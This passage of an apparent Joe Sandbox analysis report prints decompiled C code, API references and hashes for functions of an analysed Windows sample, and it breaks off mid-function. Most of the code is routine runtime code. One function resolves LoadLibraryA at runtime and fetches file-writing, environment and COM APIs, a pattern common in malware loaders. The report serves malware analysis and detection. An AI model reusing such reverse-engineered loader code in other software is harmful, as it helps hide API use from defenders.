                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                            • String ID: 8)D$ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                            • API String ID: 667068680-3962871859
                                                                                                                            • Opcode ID: af1345a2fac0a59ac7a20df2d71d609b95e0826f61607186ef5aec67a7c08b5f
                                                                                                                            • Instruction ID: f41908012bf2e6a48c01f2c499fe55f1ed0b47d752f575d982431e0d27bd32a7
                                                                                                                            • Opcode Fuzzy Hash: af1345a2fac0a59ac7a20df2d71d609b95e0826f61607186ef5aec67a7c08b5f
                                                                                                                            • Instruction Fuzzy Hash: 5CF0FEF9B43354BECB115F706E459073E64B70E722B506437F40492270DAF881408F5C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004025C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004025C0(intOrPtr* __ecx, intOrPtr _a4) {
				void* __ebp;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t15;
				void* _t16;
				intOrPtr* _t18;
				char _t19;
				intOrPtr _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;

				_t12 = __ecx;
				_t18 = __ecx;
				 *__ecx = _a4;
				_a4 = 0;
				_t19 =  *0x44291c; // 0x1
				if(_t19 == 0) {
					_t15 = GetModuleHandleA("KERNEL32");
					if(_t15 == 0) {
						L2:
						E0040D8B0(_t12);
					}
					 *0x44290c = GetProcAddress(_t15, "CreateActCtxA");
					 *0x442910 = GetProcAddress(_t15, "ReleaseActCtx");
					 *0x442914 = GetProcAddress(_t15, "ActivateActCtx");
					_t9 = GetProcAddress(_t15, "DeactivateActCtx");
					_t21 =  *0x44290c; // 0x76cbe4f0
					 *0x442918 = _t9;
					_t16 = _t16;
					if(_t21 == 0) {
						__eflags =  *0x442910; // 0x76c87540
						if(__eflags != 0) {
							goto L2;
						} else {
							__eflags =  *0x442914; // 0x76c87510
							if(__eflags != 0) {
								goto L2;
							} else {
								__eflags = _t9;
								if(_t9 != 0) {
									goto L2;
								}
							}
						}
					} else {
						_t22 =  *0x442910; // 0x76c87540
						if(_t22 == 0) {
							goto L2;
						} else {
							_t23 =  *0x442914; // 0x76c87510
							if(_t23 == 0) {
								goto L2;
							} else {
								if(_t9 == 0) {
									goto L2;
								}
							}
						}
					}
					 *0x44291c = 1;
				}
				return _t18;
			}












                                                                                                                            0x004025c0
                                                                                                                            0x004025c6
                                                                                                                            0x004025ca
                                                                                                                            0x004025cd
                                                                                                                            0x004025d0
                                                                                                                            0x004025d7
                                                                                                                            0x004025e8
                                                                                                                            0x004025ec
                                                                                                                            0x004025ee
                                                                                                                            0x004025ee
                                                                                                                            0x004025ee
                                                                                                                            0x00402608
                                                                                                                            0x00402615
                                                                                                                            0x00402622
                                                                                                                            0x00402627
                                                                                                                            0x00402629
                                                                                                                            0x0040262f
                                                                                                                            0x00402634
                                                                                                                            0x00402635
                                                                                                                            0x0040264d
                                                                                                                            0x00402653
                                                                                                                            0x00000000
                                                                                                                            0x00402655
                                                                                                                            0x00402655
                                                                                                                            0x0040265b
                                                                                                                            0x00000000
                                                                                                                            0x0040265d
                                                                                                                            0x0040265d
                                                                                                                            0x0040265f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040265f
                                                                                                                            0x0040265b
                                                                                                                            0x00402637
                                                                                                                            0x00402637
                                                                                                                            0x0040263d
                                                                                                                            0x00000000
                                                                                                                            0x0040263f
                                                                                                                            0x0040263f
                                                                                                                            0x00402645
                                                                                                                            0x00000000
                                                                                                                            0x00402647
                                                                                                                            0x00402649
                                                                                                                            0x00000000
                                                                                                                            0x0040264b
                                                                                                                            0x00402649
                                                                                                                            0x00402645
                                                                                                                            0x0040263d
                                                                                                                            0x00402661
                                                                                                                            0x00402661
                                                                                                                            0x0040266d

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,004032D5,000000FF), ref: 004025E2
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 00402600
                                                                                                                            • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 0040260D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 0040261A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 00402627
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                            • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                            • API String ID: 667068680-3617302793
                                                                                                                            • Opcode ID: b4df3619b37cc3496a548b0d5401e3dd5f14a7fbd3a74035aa6f2b756e02113c
                                                                                                                            • Instruction ID: 87ea16cc2c418cfedbe5317f826220736cd6080bd092a7339ce82a67a53d97bd
                                                                                                                            • Opcode Fuzzy Hash: b4df3619b37cc3496a548b0d5401e3dd5f14a7fbd3a74035aa6f2b756e02113c
                                                                                                                            • Instruction Fuzzy Hash: F711A0F5A02304BBDB20AF665E894277AA4AB56717B40543FF000B22E0D2FA4B40CA5E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004221F5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46libraryloaderCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 87%
                                                                                                                            			E004221F5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t20;
				intOrPtr _t24;
				intOrPtr _t28;
				intOrPtr _t39;
				void* _t40;

				_t31 = __ebx;
				_push(0xc);
				_push(0x43d140);
				E0042066C(__ebx, __edi, __esi);
				_t20 = GetModuleHandleA("KERNEL32.DLL");
				 *(_t40 - 0x1c) = _t20;
				_t39 =  *((intOrPtr*)(_t40 + 8));
				 *((intOrPtr*)(_t39 + 0x5c)) = 0x4417d8;
				 *((intOrPtr*)(_t39 + 0x14)) = 1;
				if(_t20 != 0) {
					_t31 = GetProcAddress;
					 *((intOrPtr*)(_t39 + 0x1f8)) = GetProcAddress(_t20, "EncodePointer");
					 *((intOrPtr*)(_t39 + 0x1fc)) = GetProcAddress( *(_t40 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t39 + 0x70)) = 1;
				 *((char*)(_t39 + 0xc8)) = 0x43;
				 *((char*)(_t39 + 0x14b)) = 0x43;
				 *(_t39 + 0x68) = 0x4418e0;
				InterlockedIncrement(0x4418e0);
				E00422A33(_t31, 1, 0xc);
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				_t24 =  *((intOrPtr*)(_t40 + 0xc));
				 *((intOrPtr*)(_t39 + 0x6c)) = _t24;
				if(_t24 == 0) {
					_t28 =  *0x441ee8; // 0x441e10
					 *((intOrPtr*)(_t39 + 0x6c)) = _t28;
				}
				_push( *((intOrPtr*)(_t39 + 0x6c)));
				E00427D08();
				 *(_t40 - 4) = 0xfffffffe;
				return E004206B1(E004222A0());
			}








                                                                                                                            0x004221f5
                                                                                                                            0x004221f5
                                                                                                                            0x004221f7
                                                                                                                            0x004221fc
                                                                                                                            0x00422206
                                                                                                                            0x0042220c
                                                                                                                            0x0042220f
                                                                                                                            0x00422212
                                                                                                                            0x0042221c
                                                                                                                            0x00422221
                                                                                                                            0x00422229
                                                                                                                            0x00422231
                                                                                                                            0x00422241
                                                                                                                            0x00422241
                                                                                                                            0x00422247
                                                                                                                            0x0042224a
                                                                                                                            0x00422251
                                                                                                                            0x0042225d
                                                                                                                            0x00422261
                                                                                                                            0x00422269
                                                                                                                            0x0042226f
                                                                                                                            0x00422273
                                                                                                                            0x00422276
                                                                                                                            0x0042227b
                                                                                                                            0x0042227d
                                                                                                                            0x00422282
                                                                                                                            0x00422282
                                                                                                                            0x00422285
                                                                                                                            0x00422288
                                                                                                                            0x0042228e
                                                                                                                            0x0042229f

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32.DLL,0043D140,0000000C,00422307,00000000,00000000,?,00402540,?,?,00000000,0040DAC2,0000000C,00000004,00401496,?), ref: 00422206
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0042222F
                                                                                                                            • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0042223F
                                                                                                                            • InterlockedIncrement.KERNEL32(004418E0), ref: 00422261
                                                                                                                            • __lock.LIBCMT ref: 00422269
                                                                                                                            • ___addlocaleref.LIBCMT ref: 00422288
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                                            • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                            • API String ID: 1036688887-2843748187
                                                                                                                            • Opcode ID: d7a28dd27f9a5a524bd2b25632c78b7b7ddabec80eb5556eca6c57993625ddee
                                                                                                                            • Instruction ID: 84902e696eba6fcacaade557b0722a52e1faaa224fc489c9169ce795c4755154
                                                                                                                            • Opcode Fuzzy Hash: d7a28dd27f9a5a524bd2b25632c78b7b7ddabec80eb5556eca6c57993625ddee
                                                                                                                            • Instruction Fuzzy Hash: 8E117071A40701AFE710AF76E841B5ABBF0AF04315F50945FE495966A1CBB8AA40CF58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00417EFD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 95%
                                                                                                                            			E00417EFD(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				char* _t23;
				void* _t29;
				signed short _t30;
				struct HDC__* _t31;
				signed int _t32;

				_t12 =  *0x441590; // 0x4917eadc
				_v8 = _t12 ^ _t32;
				_t31 = GetStockObject;
				_t30 = 0xa;
				_v72 = __ecx;
				_t23 = "System";
				_t14 = GetStockObject(0x11);
				if(_t14 != 0) {
					L2:
					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
						_t23 =  &_v40;
						_t31 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t31);
					}
					L6:
					_t16 = _a4;
					if(_a4 == 0) {
						_t16 = _t30 & 0x0000ffff;
					}
					return E0041D773(E00417DAE(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
				}
				_t14 = GetStockObject(0xd);
				if(_t14 == 0) {
					goto L6;
				}
				goto L2;
			}

















                                                                                                                            0x00417f03
                                                                                                                            0x00417f0a
                                                                                                                            0x00417f0f
                                                                                                                            0x00417f18
                                                                                                                            0x00417f1b
                                                                                                                            0x00417f1e
                                                                                                                            0x00417f23
                                                                                                                            0x00417f27
                                                                                                                            0x00417f31
                                                                                                                            0x00417f40
                                                                                                                            0x00417f44
                                                                                                                            0x00417f51
                                                                                                                            0x00417f53
                                                                                                                            0x00417f55
                                                                                                                            0x00417f55
                                                                                                                            0x00417f70
                                                                                                                            0x00417f73
                                                                                                                            0x00417f73
                                                                                                                            0x00417f79
                                                                                                                            0x00417f79
                                                                                                                            0x00417f7f
                                                                                                                            0x00417f81
                                                                                                                            0x00417f81
                                                                                                                            0x00417f9c
                                                                                                                            0x00417f9c
                                                                                                                            0x00417f2b
                                                                                                                            0x00417f2f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00417F23
                                                                                                                            • GetStockObject.GDI32(0000000D), ref: 00417F2B
                                                                                                                            • GetObjectA.GDI32(00000000,0000003C,?), ref: 00417F38
                                                                                                                            • GetDC.USER32(00000000), ref: 00417F47
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00417F5B
                                                                                                                            • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 00417F67
                                                                                                                            • ReleaseDC.USER32 ref: 00417F73
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                            • String ID: System
                                                                                                                            • API String ID: 46613423-3470857405
                                                                                                                            • Opcode ID: 91e502c68c71769b0f47dd770796e2de8b4ea933cf187db424bb35b6928cff41
                                                                                                                            • Instruction ID: 3f3db2897e4fa0a8b4e0ea9afd87b9669a72131219665e9c306743529c74ea03
                                                                                                                            • Opcode Fuzzy Hash: 91e502c68c71769b0f47dd770796e2de8b4ea933cf187db424bb35b6928cff41
                                                                                                                            • Instruction Fuzzy Hash: 27114271640218ABDB14DFA1DD45FEFBBB8AB54745F00002AF601A6291DB749D42CB68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401510 Relevance: 14.0, APIs: 2, Strings: 6, Instructions: 30libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 86%
                                                                                                                            			E00401510(struct HINSTANCE__** __eax) {
				void* __esi;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t11;
				struct HINSTANCE__* _t14;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__** _t23;

				_t23 = __eax;
				_t10 = GetModuleHandleW(L"kernel32");
				 *_t23 = _t10;
				_t11 = GetProcAddress(_t10, "LoadLibraryA");
				_t23[6] = _t11;
				_t23[1] =  *_t11("SHELL32");
				_t14 =  *(_t23[6])("USER32");
				_t23[2] = _t14;
				_t15 =  *(_t23[6])("OLE32");
				_t23[3] = _t15;
				_t23[4] =  *(_t23[6])("OLEAUT32");
				E00401580(_t23);
				E00401600(_t23);
				E00401700(_t23);
				return _t23;
			}









                                                                                                                            0x00401516
                                                                                                                            0x00401518
                                                                                                                            0x00401524
                                                                                                                            0x00401526
                                                                                                                            0x00401531
                                                                                                                            0x00401536
                                                                                                                            0x00401541
                                                                                                                            0x0040154b
                                                                                                                            0x0040154e
                                                                                                                            0x00401558
                                                                                                                            0x0040155d
                                                                                                                            0x00401560
                                                                                                                            0x00401565
                                                                                                                            0x0040156a
                                                                                                                            0x00401572

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32,?,00402430), ref: 00401518
                                                                                                                            • GetProcAddress.KERNEL32(00000000,LoadLibraryA), ref: 00401526
                                                                                                                              • Part of subcall function 00401580: GetProcAddress.KERNEL32 ref: 004015CA
                                                                                                                              • Part of subcall function 00401580: GetProcAddress.KERNEL32(00000000,GetEnvironmentVariableW), ref: 004015D7
                                                                                                                              • Part of subcall function 00401580: GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 004015E4
                                                                                                                              • Part of subcall function 00401600: GetProcAddress.KERNEL32(4917EADC,CreateFileW), ref: 0040161D
                                                                                                                              • Part of subcall function 00401600: GetProcAddress.KERNEL32 ref: 004016C2
                                                                                                                              • Part of subcall function 00401600: GetProcAddress.KERNEL32(?,?), ref: 004016D0
                                                                                                                              • Part of subcall function 00401600: GetProcAddress.KERNEL32(?,CoCreateInstance), ref: 004016DE
                                                                                                                              • Part of subcall function 00401600: GetProcAddress.KERNEL32(00000000,WriteFile), ref: 004016EB
                                                                                                                              • Part of subcall function 00401700: GetProcAddress.KERNEL32 ref: 0040177E
                                                                                                                              • Part of subcall function 00401700: GetProcAddress.KERNEL32(?,75BBB980), ref: 004017AC
                                                                                                                              • Part of subcall function 00401700: GetProcAddress.KERNEL32 ref: 00401823
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                            • String ID: LoadLibraryA$OLE32$OLEAUT32$SHELL32$USER32$kernel32
                                                                                                                            • API String ID: 667068680-420459639
                                                                                                                            • Opcode ID: 73273434a02bd70face254dfe792805de518a8432a7a23bfbb6fdd230da28e68
                                                                                                                            • Instruction ID: 60f6532a21f542cf02d28fc19c02ae36202df42797774ceee6822b554e987bea
                                                                                                                            • Opcode Fuzzy Hash: 73273434a02bd70face254dfe792805de518a8432a7a23bfbb6fdd230da28e68
                                                                                                                            • Instruction Fuzzy Hash: 49F05471A407009BC764FFF69C09A47F6E0AE4C7413205D2EF056D7561DE7CE5408B88
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040E593 Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 90%
                                                                                                                            			E0040E593(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				void* _t39;
				long _t41;
				void* _t42;
				long _t47;
				void* _t53;
				signed int _t55;
				long* _t62;
				struct _CRITICAL_SECTION* _t64;
				void* _t65;
				void* _t66;

				_push(0x10);
				E0041E9B4(E0043162A, __ebx, __edi, __esi);
				_t62 = __ecx;
				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
				_t64 = __ecx + 0x1c;
				 *(_t66 - 0x14) = _t64;
				EnterCriticalSection(_t64);
				_t36 =  *(_t66 + 8);
				if(_t36 <= 0 || _t36 >= _t62[3]) {
					LeaveCriticalSection(_t64);
				} else {
					_t65 = TlsGetValue( *_t62);
					if(_t65 == 0) {
						 *(_t66 - 4) = 0;
						_t39 = E0040E246(0x10);
						if(_t39 == 0) {
							_t65 = 0;
						} else {
							 *_t39 = 0x434db4;
							_t65 = _t39;
						}
						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						 *(_t65 + 8) = 0;
						 *(_t65 + 0xc) = 0;
						E0040E362( &(_t62[5]), _t65);
						goto L5;
					} else {
						_t55 =  *(_t66 + 8);
						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
							L5:
							if( *(_t65 + 0xc) != 0) {
								_t41 = E004014F0(_t62[3], 4);
								_t53 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t47 = E004014F0(_t62[3], 4);
								_pop(_t53);
								_t42 = LocalAlloc(0, _t47);
							}
							if(_t42 == 0) {
								LeaveCriticalSection( *(_t66 - 0x14));
								_t42 = E0040D87C(_t53);
							}
							 *(_t65 + 0xc) = _t42;
							E0041EC90(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t62[3];
							TlsSetValue( *_t62, _t65);
							_t55 =  *(_t66 + 8);
						}
					}
					_t36 =  *(_t65 + 0xc);
					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
					}
					LeaveCriticalSection( *(_t66 - 0x14));
				}
				return E0041EA59(_t36);
			}














                                                                                                                            0x0040e593
                                                                                                                            0x0040e59a
                                                                                                                            0x0040e59f
                                                                                                                            0x0040e5a1
                                                                                                                            0x0040e5a4
                                                                                                                            0x0040e5a8
                                                                                                                            0x0040e5ab
                                                                                                                            0x0040e5b1
                                                                                                                            0x0040e5b8
                                                                                                                            0x0040e6ba
                                                                                                                            0x0040e5c7
                                                                                                                            0x0040e5cf
                                                                                                                            0x0040e5d3
                                                                                                                            0x0040e607
                                                                                                                            0x0040e60a
                                                                                                                            0x0040e611
                                                                                                                            0x0040e61d
                                                                                                                            0x0040e613
                                                                                                                            0x0040e613
                                                                                                                            0x0040e619
                                                                                                                            0x0040e619
                                                                                                                            0x0040e61f
                                                                                                                            0x0040e627
                                                                                                                            0x0040e62a
                                                                                                                            0x0040e62d
                                                                                                                            0x00000000
                                                                                                                            0x0040e5d5
                                                                                                                            0x0040e5d5
                                                                                                                            0x0040e5db
                                                                                                                            0x0040e5ea
                                                                                                                            0x0040e5ed
                                                                                                                            0x0040e651
                                                                                                                            0x0040e657
                                                                                                                            0x0040e65c
                                                                                                                            0x0040e5ef
                                                                                                                            0x0040e5f4
                                                                                                                            0x0040e5fa
                                                                                                                            0x0040e5fd
                                                                                                                            0x0040e5fd
                                                                                                                            0x0040e664
                                                                                                                            0x0040e669
                                                                                                                            0x0040e66f
                                                                                                                            0x0040e66f
                                                                                                                            0x0040e677
                                                                                                                            0x0040e688
                                                                                                                            0x0040e694
                                                                                                                            0x0040e699
                                                                                                                            0x0040e69f
                                                                                                                            0x0040e69f
                                                                                                                            0x0040e5db
                                                                                                                            0x0040e6a2
                                                                                                                            0x0040e6a7
                                                                                                                            0x0040e6b1
                                                                                                                            0x0040e6b1
                                                                                                                            0x0040e6ba
                                                                                                                            0x0040e6ba
                                                                                                                            0x0040e6c5

                                                                                                                            APIs
                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 0040E59A
                                                                                                                            • EnterCriticalSection.KERNEL32(?,00000010,0040E84C,?,00000000,?,00000004,0040707C,00405A19,00402E5A,?,?,00401084), ref: 0040E5AB
                                                                                                                            • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,0040707C,00405A19,00402E5A,?,?,00401084), ref: 0040E5C9
                                                                                                                            • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,0040707C,00405A19,00402E5A,?,?,00401084), ref: 0040E5FD
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,0040707C,00405A19,00402E5A,?,?,00401084), ref: 0040E669
                                                                                                                            • _memset.LIBCMT ref: 0040E688
                                                                                                                            • TlsSetValue.KERNEL32(?,00000000,?,4917EADC), ref: 0040E699
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,0040707C,00405A19,00402E5A,?,?,00401084), ref: 0040E6BA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1891723912-0
                                                                                                                            • Opcode ID: f5f2a573c8da64d767953a6042d6f6cd86ef0a412ea905fdd8f17436f43fc6ec
                                                                                                                            • Instruction ID: 66a2ccb0d4b585c291f210245b0b97c44ba858faeae49306fa5a0dca6e961c81
                                                                                                                            • Opcode Fuzzy Hash: f5f2a573c8da64d767953a6042d6f6cd86ef0a412ea905fdd8f17436f43fc6ec
                                                                                                                            • Instruction Fuzzy Hash: E6318070500605AFCB10AF52D885D6AB7B1FF14315B10CD3EE916A76A1CB39A9A0DF89
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041B114 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 118memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 41%
                                                                                                                            			E0041B114(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t42;
				void* _t46;
				void* _t47;
				void* _t52;
				intOrPtr _t66;
				intOrPtr _t74;
				void* _t76;
				void* _t96;
				void* _t97;
				intOrPtr* _t98;
				void* _t99;
				short* _t101;
				void* _t102;
				signed int _t103;
				void* _t105;

				_t96 = __edx;
				_t103 = _t105 - 0x8c;
				_t42 =  *0x441590; // 0x4917eadc
				 *(_t103 + 0x88) = _t42 ^ _t103;
				_t74 =  *((intOrPtr*)(_t103 + 0x98));
				_t101 =  *((intOrPtr*)(_t103 + 0x94));
				_push(_t97);
				E0041EC90(_t97, _t101, 0, 0x20);
				 *((intOrPtr*)(_t103 - 0x80)) = _t103 - 0x78;
				_t46 = E0040E1E8(_t74, 0x4357f8);
				_t98 = __imp__#2;
				if(_t46 == 0) {
					_t47 = E0040E1E8(_t74, "@LC");
					__eflags = _t47;
					_push(0x100);
					_push(_t103 - 0x78);
					if(_t47 == 0) {
						_push(0xf108);
						E0040E905(_t74, _t98, _t101, _t103);
						 *_t101 = 0xf108;
					} else {
						_push(0xf10a);
						E0040E905(_t74, _t98, _t101, _t103);
						 *_t101 = 0xf10a;
					}
				} else {
					 *((intOrPtr*)(_t103 - 0x80)) =  *((intOrPtr*)(_t74 + 0xc));
					 *_t101 =  *((intOrPtr*)(_t74 + 8));
					 *((intOrPtr*)(_t101 + 0x10)) =  *((intOrPtr*)(_t74 + 0x10));
					 *((intOrPtr*)(_t101 + 0x1c)) =  *((intOrPtr*)(_t74 + 0x1c));
					_t66 =  *((intOrPtr*)(_t74 + 0x14));
					_t111 =  *((intOrPtr*)(_t66 - 0xc));
